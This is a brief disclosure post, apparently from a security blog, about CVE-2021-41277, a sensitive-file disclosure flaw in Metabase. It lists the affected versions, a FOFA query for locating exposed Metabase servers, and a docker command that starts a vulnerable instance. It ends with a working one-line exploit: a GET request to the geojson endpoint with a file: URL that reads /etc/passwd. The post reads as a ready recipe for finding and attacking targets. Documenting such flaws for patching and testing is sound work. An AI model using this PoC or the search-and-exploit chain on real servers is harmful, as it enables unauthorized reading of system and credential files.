CVE-2021–41277 Metabase sensitive information disclosure

0x0021h
Nov 21, 2021

--

The vulnerability CVSS score: 9.9, damage level: severe

FOFA:

app="metabase"

Affected version:

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5

Vulnerability demonstration:

docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4

PoC:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1

--

--